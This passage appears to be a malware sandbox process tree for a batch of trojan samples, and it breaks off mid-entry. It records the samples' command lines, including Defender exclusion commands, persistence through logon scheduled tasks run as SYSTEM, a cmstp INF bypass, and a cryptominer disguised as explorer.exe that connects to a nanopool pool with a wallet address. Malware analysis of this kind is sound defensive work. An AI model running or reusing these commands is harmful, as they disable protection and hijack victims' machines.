- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-773c6c1df1660b9cfaf7f1a080703951b7ba711bba3f9f3186bc8700ffcc8800.exe
    HEUR-Trojan.MSIL.Crypt.gen-773c6c1df1660b9cfaf7f1a080703951b7ba711bba3f9f3186bc8700ffcc8800.exe
    3⤵
    PID:7148
  - - \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ezars3dw.inf
      4⤵
      PID:2384
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-79b5e5fec04494b8b1f788e361cc6c9ad9c224ae4304d0af2b97f166cdfa02fa.exe
    HEUR-Trojan.MSIL.Crypt.gen-79b5e5fec04494b8b1f788e361cc6c9ad9c224ae4304d0af2b97f166cdfa02fa.exe
    3⤵
    PID:6040
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-79b5e5fec04494b8b1f788e361cc6c9ad9c224ae4304d0af2b97f166cdfa02fa.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-79b5e5fec04494b8b1f788e361cc6c9ad9c224ae4304d0af2b97f166cdfa02fa.exe"
      4⤵
      PID:5336
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe
    HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe
    3⤵
    PID:7556
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe"
      4⤵
      PID:4156
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-87a4d742a3fa7fbe3a8506e2476bdb31166a0d37945a711e958898bb3c0c8051.exe"
      4⤵
      PID:7500
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-8b8ea468c6cb4dd54df6837347eaa423c89017494e8db1ff40e6e819af086913.exe
    HEUR-Trojan.MSIL.Crypt.gen-8b8ea468c6cb4dd54df6837347eaa423c89017494e8db1ff40e6e819af086913.exe
    3⤵
    PID:10188
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 872
      4⤵
      PID:11972
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a0084fcb779319411ba0228a3e15cb3f76624d7077d46f309714de8d60f1980f.exe
    HEUR-Trojan.MSIL.Crypt.gen-a0084fcb779319411ba0228a3e15cb3f76624d7077d46f309714de8d60f1980f.exe
    3⤵
    PID:3568
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a0084fcb779319411ba0228a3e15cb3f76624d7077d46f309714de8d60f1980f.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a0084fcb779319411ba0228a3e15cb3f76624d7077d46f309714de8d60f1980f.exe"
      4⤵
      PID:3956
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a7707d7c6817f644a8ae8d9eb5ddb5640ecd1000e15a492aa10d770f75c7bfce.exe
    HEUR-Trojan.MSIL.Crypt.gen-a7707d7c6817f644a8ae8d9eb5ddb5640ecd1000e15a492aa10d770f75c7bfce.exe
    3⤵
    PID:10676
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a7707d7c6817f644a8ae8d9eb5ddb5640ecd1000e15a492aa10d770f75c7bfce.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-a7707d7c6817f644a8ae8d9eb5ddb5640ecd1000e15a492aa10d770f75c7bfce.exe"
      4⤵
      PID:8348
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-b5ad18ef31effc530a15eb4d6968e24b5ce733944d20984cddd7b76f7b1901d5.exe
    HEUR-Trojan.MSIL.Crypt.gen-b5ad18ef31effc530a15eb4d6968e24b5ce733944d20984cddd7b76f7b1901d5.exe
    3⤵
    PID:8980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8980 -s 1476
      4⤵
      Program crash
      PID:6188
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-b7414d73458a789c8e8aa260b0a6b423d181cf5d9189f13a2c0f4f00f7c3b6cd.exe
    HEUR-Trojan.MSIL.Crypt.gen-b7414d73458a789c8e8aa260b0a6b423d181cf5d9189f13a2c0f4f00f7c3b6cd.exe
    3⤵
    PID:4304
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-b7bbde4d0cd5bfae535c5b41db5de898d21ed9604f8e60de9c77682f11adc51b.exe
    HEUR-Trojan.MSIL.Crypt.gen-b7bbde4d0cd5bfae535c5b41db5de898d21ed9604f8e60de9c77682f11adc51b.exe
    3⤵
    PID:9716
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-cb3940ae456ae7b7b668a0e2358696d48a39158a4e49116b6bddc0aee3b01fed.exe
    HEUR-Trojan.MSIL.Crypt.gen-cb3940ae456ae7b7b668a0e2358696d48a39158a4e49116b6bddc0aee3b01fed.exe
    3⤵
    PID:12168
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-cb3940ae456ae7b7b668a0e2358696d48a39158a4e49116b6bddc0aee3b01fed.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-cb3940ae456ae7b7b668a0e2358696d48a39158a4e49116b6bddc0aee3b01fed.exe"
      4⤵
      PID:12064
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-cc648faa236f4102c1f0d60fb403328cb73ad7e635a4bdc9b5d3dc472c00f248.exe
    HEUR-Trojan.MSIL.Crypt.gen-cc648faa236f4102c1f0d60fb403328cb73ad7e635a4bdc9b5d3dc472c00f248.exe
    3⤵
    PID:7944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7944 -s 1784
      4⤵
      Program crash
      PID:9324
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d666a4701409e3bc53e8870929e34e45a0ec1da85f68f6ecc5cfb84adead404b.exe
    HEUR-Trojan.MSIL.Crypt.gen-d666a4701409e3bc53e8870929e34e45a0ec1da85f68f6ecc5cfb84adead404b.exe
    3⤵
    PID:436
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe
    HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe
    3⤵
    PID:8860
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe"
      4⤵
      PID:12116
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe"
      4⤵
      PID:3060
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d688e72edd96b43f7fc4bd9b62b268f3c3fd34da64813a90acc4b066c3293a51.exe"
      4⤵
      PID:5124
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d9c665056da4d5763bdaf94229a44d67b99dfec371b8619eb8a3a49803ce98d3.exe
    HEUR-Trojan.MSIL.Crypt.gen-d9c665056da4d5763bdaf94229a44d67b99dfec371b8619eb8a3a49803ce98d3.exe
    3⤵
    PID:9704
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STizRTUNmqj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp21A9.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:11948
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d9c665056da4d5763bdaf94229a44d67b99dfec371b8619eb8a3a49803ce98d3.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-d9c665056da4d5763bdaf94229a44d67b99dfec371b8619eb8a3a49803ce98d3.exe"
      4⤵
      PID:11612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11612 -s 1752
        5⤵
        Program crash
        
        PID:5932
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-decfb4fd1bcbf2b07188f6d66543d4266ec971e1e3e9d8e0fe4fd1af23a88278.exe
    HEUR-Trojan.MSIL.Crypt.gen-decfb4fd1bcbf2b07188f6d66543d4266ec971e1e3e9d8e0fe4fd1af23a88278.exe
    3⤵
    PID:6808
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-decfb4fd1bcbf2b07188f6d66543d4266ec971e1e3e9d8e0fe4fd1af23a88278.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-decfb4fd1bcbf2b07188f6d66543d4266ec971e1e3e9d8e0fe4fd1af23a88278.exe"
      4⤵
      PID:6316
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-e4f46edc55e8358049d4ddeef12e373bbab778fe764974060acdca88a6323e0b.exe
    HEUR-Trojan.MSIL.Crypt.gen-e4f46edc55e8358049d4ddeef12e373bbab778fe764974060acdca88a6323e0b.exe
    3⤵
    PID:9100
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-e8f2c109dc41dd8640fc03b9ab8f9bff1639e94fe346cbc11202f164842e823b.exe
    HEUR-Trojan.MSIL.Crypt.gen-e8f2c109dc41dd8640fc03b9ab8f9bff1639e94fe346cbc11202f164842e823b.exe
    3⤵
    PID:7664
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WTtrLOejJg" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEB47.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:11016
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-e8f2c109dc41dd8640fc03b9ab8f9bff1639e94fe346cbc11202f164842e823b.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-e8f2c109dc41dd8640fc03b9ab8f9bff1639e94fe346cbc11202f164842e823b.exe"
      4⤵
      PID:12120
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12120 -s 1760
        5⤵
        Program crash
        
        PID:9368
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-eb69a69e08067150d93c03c3c1abde0e7c976417c7145bf773729e673f1ea832.exe
    HEUR-Trojan.MSIL.Crypt.gen-eb69a69e08067150d93c03c3c1abde0e7c976417c7145bf773729e673f1ea832.exe
    3⤵
    PID:2640
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-eb69a69e08067150d93c03c3c1abde0e7c976417c7145bf773729e673f1ea832.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-eb69a69e08067150d93c03c3c1abde0e7c976417c7145bf773729e673f1ea832.exe"
      4⤵
      PID:8572
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ebc38d17ab9785ff213a06cde0ca5d1c76aaf1093545be3ce7c1e20559ffb38d.exe
    HEUR-Trojan.MSIL.Crypt.gen-ebc38d17ab9785ff213a06cde0ca5d1c76aaf1093545be3ce7c1e20559ffb38d.exe
    3⤵
    PID:8544
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rknyysocrjFq" /XML "C:\Users\Admin\AppData\Local\Temp\tmp388C.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2356
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ebc38d17ab9785ff213a06cde0ca5d1c76aaf1093545be3ce7c1e20559ffb38d.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ebc38d17ab9785ff213a06cde0ca5d1c76aaf1093545be3ce7c1e20559ffb38d.exe"
      4⤵
      PID:5992
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe
    HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe
    3⤵
    PID:5884
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe"
      4⤵
      PID:6116
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ec0aee0044fa691d3baa56fb1a11e3025d17151c258ddf7c6197c6aa0be69a99.exe"
      4⤵
      PID:5652
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ed979e214d266b13af8097b86153af62489e2fbb61a06168cd09b9382ab20f5e.exe
    HEUR-Trojan.MSIL.Crypt.gen-ed979e214d266b13af8097b86153af62489e2fbb61a06168cd09b9382ab20f5e.exe
    3⤵
    PID:5988
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef74c5176c866aff64ff561523c40b562dbce403ec91b060019bfb8ea4ba2e5c.exe
    HEUR-Trojan.MSIL.Crypt.gen-ef74c5176c866aff64ff561523c40b562dbce403ec91b060019bfb8ea4ba2e5c.exe
    3⤵
    PID:4352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef74c5176c866aff64ff561523c40b562dbce403ec91b060019bfb8ea4ba2e5c.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:11692
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\SBCAzwWyzk.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:10184
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SBCAzwWyzk" /XML "C:\Users\Admin\AppData\Local\Temp\tmp31B6.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9812
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\SBCAzwWyzk.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:11020
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef74c5176c866aff64ff561523c40b562dbce403ec91b060019bfb8ea4ba2e5c.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef74c5176c866aff64ff561523c40b562dbce403ec91b060019bfb8ea4ba2e5c.exe"
      4⤵
      PID:11976
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef7ca349db643e7e33124d5dfd71dfc6a95c722754a44a6ede5dda3a23408c6b.exe
    HEUR-Trojan.MSIL.Crypt.gen-ef7ca349db643e7e33124d5dfd71dfc6a95c722754a44a6ede5dda3a23408c6b.exe
    3⤵
    PID:9840
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef7ca349db643e7e33124d5dfd71dfc6a95c722754a44a6ede5dda3a23408c6b.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-ef7ca349db643e7e33124d5dfd71dfc6a95c722754a44a6ede5dda3a23408c6b.exe"
      4⤵
      PID:11604
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-f06732d010666afffd7167153976fc38d012c4ff06818557093ccad083984268.exe
    HEUR-Trojan.MSIL.Crypt.gen-f06732d010666afffd7167153976fc38d012c4ff06818557093ccad083984268.exe
    3⤵
    PID:9544
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 1012
      4⤵
      PID:10860
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-f18fbd968188e63ae6ac96ffbefb034ab0e7248fbf7917e7a2c2372b7378a75b.exe
    HEUR-Trojan.MSIL.Crypt.gen-f18fbd968188e63ae6ac96ffbefb034ab0e7248fbf7917e7a2c2372b7378a75b.exe
    3⤵
    PID:11588
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
      dw20.exe -x -s 916
      4⤵
      PID:12028
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-fae7de2e8034c30b5bebe2f4813c470243c546f1a3e805564b6b800bdbb44451.exe
    HEUR-Trojan.MSIL.Crypt.gen-fae7de2e8034c30b5bebe2f4813c470243c546f1a3e805564b6b800bdbb44451.exe
    3⤵
    PID:10176
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-fe8129a741b1fba7739ea8641f811e5336b2d76c1dae8d386353b657130a12b4.exe
    HEUR-Trojan.MSIL.Crypt.gen-fe8129a741b1fba7739ea8641f811e5336b2d76c1dae8d386353b657130a12b4.exe
    3⤵
    PID:10388
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-fe8129a741b1fba7739ea8641f811e5336b2d76c1dae8d386353b657130a12b4.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-fe8129a741b1fba7739ea8641f811e5336b2d76c1dae8d386353b657130a12b4.exe"
      4⤵
      PID:4124
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.vho-dd63a8578a9b53d8f4bad6e099f65c405377aa1d499d622e5e8a063b91b107f6.exe
    HEUR-Trojan.MSIL.Crypt.vho-dd63a8578a9b53d8f4bad6e099f65c405377aa1d499d622e5e8a063b91b107f6.exe
    3⤵
    PID:6016
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-06398a633bb1e3a8ab80146380b163988bcae3ac3a02b23c6ea916dc0727c1d6.exe
    HEUR-Trojan.MSIL.Cryptos.gen-06398a633bb1e3a8ab80146380b163988bcae3ac3a02b23c6ea916dc0727c1d6.exe
    3⤵
    PID:8076
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-06398a633bb1e3a8ab80146380b163988bcae3ac3a02b23c6ea916dc0727c1d6.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-06398a633bb1e3a8ab80146380b163988bcae3ac3a02b23c6ea916dc0727c1d6.exe"
      4⤵
      PID:5168
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-0821502d4fb466814c0c0bd86cd1652778c1d0bb50db14eaa3d529d17be7db88.exe
    HEUR-Trojan.MSIL.Cryptos.gen-0821502d4fb466814c0c0bd86cd1652778c1d0bb50db14eaa3d529d17be7db88.exe
    3⤵
    PID:10100
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
      4⤵
      PID:7896
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7208
  - - C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
      4⤵
      PID:12028
  - - C:\Windows\system32\services32.exe
      "C:\Windows\system32\services32.exe"
      4⤵
      PID:372
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Cryptos.gen-0a537ef0808a8cd709cadee000a424b54d22fc08d7e654ee1750623176373e19.exe
    HEUR-Trojan.MSIL.Cryptos.gen-0a537ef0808a8cd709cadee000a424b54d22fc08d7e654ee1750623176373e19.exe
    3⤵
    PID:5060
  - - C:\Users\Admin\AppData\Local\Temp\(64-Bit) 4K Video Downloader v4.13.5.3950 Patch.exe
      "C:\Users\Admin\AppData\Local\Temp\(64-Bit) 4K Video Downloader v4.13.5.3950 Patch.exe"
      4⤵
      PID:5348
  - - C:\Users\Admin\AppData\Local\Temp\c42330143837f29b.exe
      "C:\Users\Admin\AppData\Local\Temp\c42330143837f29b.exe"
      4⤵
      PID:4348
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
        5⤵
        
        PID:5224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\00451'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1608
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\Services.exe"' /RU "SYSTEM" & exit
        5⤵
        
        PID:9124
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\Services.exe"' /RU "SYSTEM"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8820
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        
        PID:5652
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
        6⤵
        
        PID:10668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Libs'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5020
    - - C:\Users\Admin\Services.exe
        
        "C:\Users\Admin\Services.exe"
        5⤵
        
        PID:10596
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
        6⤵
        
        PID:10340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\Services.exe"' /RU "SYSTEM" & exit
        6⤵
        
        PID:5712
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\Services.exe"' /RU "SYSTEM"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3876
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        
        PID:6476
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
        7⤵
        
        PID:4400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Libs'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10972
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=42z9Fe3LwWgBe2iDmJqvmHDNsAKroadk13jHpA6DaGUiR9x8hi8vrfdUbe2YyAtXBVXZLHcKNhd3BKaCGEF8UVmeQXtazxF.COFGADUSE --pass= --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --tls --cinit-stealth
        6⤵
        
        PID:9944
  - - C:\Users\Admin\AppData\Local\Temp\3b294c4ef447e113.exe
      "C:\Users\Admin\AppData\Local\Temp\3b294c4ef447e113.exe"
      4⤵
      PID:1596
    - - C:\Windows\System32\cmd.exe
        
